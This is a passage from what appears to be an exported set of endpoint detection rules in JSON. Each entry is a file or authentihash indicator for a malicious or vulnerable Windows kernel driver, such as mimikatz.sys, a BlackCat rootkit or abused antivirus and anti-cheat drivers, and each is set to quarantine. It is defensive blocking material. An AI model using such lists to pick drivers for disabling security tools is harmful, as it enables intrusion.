"Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "57b33225-5119-53ab-a6be-b6f8dd45035c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985539Z", + "creation_date": "2026-03-23T11:45:29.985541Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985547Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5ed22c0033aed380aa154e672e8db3a2d4c195c4", + "comment": "Malicious BlackCat/ALPHV Ransomware Rootkit (aka fgme.sys, ktes.sys, kt2.sys and ktgn.sys) [https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html] [file SHA1]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "57b68ae8-9a2a-5132-8dc0-5f2598228c1e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.475988Z", + "creation_date": "2026-03-23T11:45:30.475991Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.475999Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6cf1cac0e97d30bb445b710fd8513879678a8b07be95d309cbf29e9b328ff259", + "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "57b73945-b57e-52a7-a8a1-a4f6075d183b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.454241Z", + "creation_date": "2026-03-23T11:45:30.454244Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.454253Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "31867db933ed4407d22de8f0ef9b52958c40c63c2328e1863dfd3fe58d3b53c3", + "comment": "Vulnerable Kernel Driver (aka sandra.sys) [https://www.loldrivers.io/drivers/bc5e020a-ecff-43c8-b57b-ee17b5f65b21/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "57c1f843-528d-5703-ba03-34b564d84073", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818013Z", + "creation_date": "2026-03-23T11:45:30.818015Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:30.818020Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "125e4475a5437634cab529da9ea2ef0f4f65f89fb25a06349d731f283c27d9fe", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "57d06bbc-4195-5b6c-9e90-9615a68c7d13", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.813220Z", + "creation_date": "2026-03-23T11:45:31.813223Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.813230Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d0d3af81c9f26ffce51b6e32a099327b357b1f16314e27e8c27a814d0d209cc3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "57d8a483-9dfc-5c3a-ba16-4c5261b85f25", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821744Z", + "creation_date": "2026-03-23T11:45:31.821747Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.821755Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "65b4d38b9cf698692870ce57820d7fc2e2560722e27b4cc2f24da9e1d1d247d3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "57e052da-4a12-5cf3-bfe1-231486a223ab", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150426Z", + "creation_date": "2026-03-23T11:45:31.150428Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150434Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "0fb2513c4a98e8102359a7e97453e0ab8518fad628fba10669d43fdda64acbf9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "57eade01-543d-5b23-970c-e0a47db8166c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488310Z", + "creation_date": "2026-03-23T11:45:31.488312Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488317Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7e9e002513b5263e1f8918ed433280a8af2c585c6ea63326f07d08fe355b5eda", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "57fb1824-3c0f-5c2d-b6e1-6d8437480fe7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.462114Z", + "creation_date": "2026-03-23T11:45:30.462117Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.462126Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b7956e31c2fcc0a84bcedf30e5f8115f4e74eed58916253a0c05c8be47283c57", + "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "57fc572c-fe03-559e-9268-fe72f2bc5057", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983815Z", + "creation_date": "2026-03-23T11:45:29.983817Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983822Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "25a0854ef48a4dfbc7f04e94d2b11757e3613b241d39d46a19cb389ce42887e4", + "comment": "Vulnerable Kernel Driver (aka GLCKIO2.sys) 
[https://www.loldrivers.io/drivers/52ded752-2708-499e-8f37-98e4a9adc23c/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5801a5bc-70bd-568c-a495-f291253a4cec", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622157Z", + "creation_date": "2026-03-23T11:45:29.622159Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622164Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7fd788358585e0b863328475898bb4400ed8d478466d1b7f5cc0252671456cc8", + "comment": "NamCo vulnerable driver (aka smep_namco.sys) [https://securelist.com/elevation-of-privileges-in-namco-driver/83707/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "580cc271-8a1f-55de-a2c7-7fac586ff885", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.470756Z", + "creation_date": "2026-03-23T11:45:30.470759Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.470767Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "89e579ccbbd834bdd1d5b394843b6110813849000d9116489f14c146cbe66811", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "58229230-e4ba-5196-a4be-3b710d4f7f20", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816526Z", + "creation_date": "2026-03-23T11:45:30.816528Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816534Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b508921632475b1aadf6194b2f3feea72959b60675dcb44bbc3f8e363f8485ea", + "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "585874ee-bf20-525b-89a0-8bbb4e2909f7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604051Z", + "creation_date": "2026-03-23T11:45:29.604054Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604060Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "74f9975737dd078c75048bb01549e7678eb61c065d1f50294b80caeb65cbd65e", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "58660078-0ae2-56ec-8fbf-8a2190b749bf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830843Z", + "creation_date": "2026-03-23T11:45:30.830845Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830851Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + 
"type": "hash", + "value": "e898abc1a79b301909f5ccf62260a359aa3822b5754b6ab2f1becfda4a4bee12", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "58667231-93f3-57fe-9a94-7f8c6434d904", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829008Z", + "creation_date": "2026-03-23T11:45:30.829010Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829016Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6fb583cf195231e5dc14e149541f525b1df8e2c0ee73d7b34d006dd2300b56a4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5867df2a-5d7e-5906-b051-bef1bef153dd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159366Z", + "creation_date": "2026-03-23T11:45:31.159369Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159374Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dfd70d4bb19abf412ac263f80350b604b1ca22bc0e48dd4c29ec9e9808335c3f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "58686c4f-caa8-5c43-985b-0bee6f686930", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.459077Z", + "creation_date": "2026-03-23T11:45:30.459080Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.459088Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2fa78c2988f9580b0c18822b117d065fb419f9c476f4cfa43925ba6cd2dffac3", + "comment": "Vulnerable Kernel Driver (aka 
netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5871d2ac-e8c4-53fe-97dd-cf961d904783", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.971985Z", + "creation_date": "2026-03-23T11:45:29.971987Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.971993Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2d2c7ee9547738a8a676ab785c151e8b48ed40fe7cf6174650814c7f5f58513b", + "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "587e6439-2826-5c81-b5b2-129d5956020b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612180Z", + "creation_date": 
"2026-03-23T11:45:29.612182Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.612188Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "39937d239220c1b779d7d55613de2c0a48bd6e12e0214da4c65992b96cf591df", + "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "588d01d8-5a4c-5bd3-b548-99edb5697539", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606777Z", + "creation_date": "2026-03-23T11:45:29.606779Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606785Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ea765eb8845fc90215975814f8da48da787f1a1449d58af0b17cb58d2af5c08e", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"58931eaa-aeb4-54b1-a367-dea085972f97", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612385Z", + "creation_date": "2026-03-23T11:45:29.612387Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.612393Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "55a1535e173c998fbbc978009b02d36ca0c737340d84ac2a8da73dfc2f450ef9", + "comment": "ASUS WinFlash vulnerable driver (aka ATSZIO.sys and ATSZIO64.sys) [https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "589374ed-96af-54bd-bf66-46b49ad60711", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970002Z", + "creation_date": "2026-03-23T11:45:29.970004Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:29.970009Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9e51062d4249945e77c7d3fdecc9797ffc38017465c8068a5f1296bf85ae558c", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "58ae260e-9338-5f0d-a907-7350e54ee896", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969400Z", + "creation_date": "2026-03-23T11:45:29.969402Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969407Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5cd7378c57afa9260976879b58b32433c0e2d52fe0cebe06e647e1165c93f4a8", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "58c0fcfd-c5b4-5eb1-9d20-d96187f25676", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
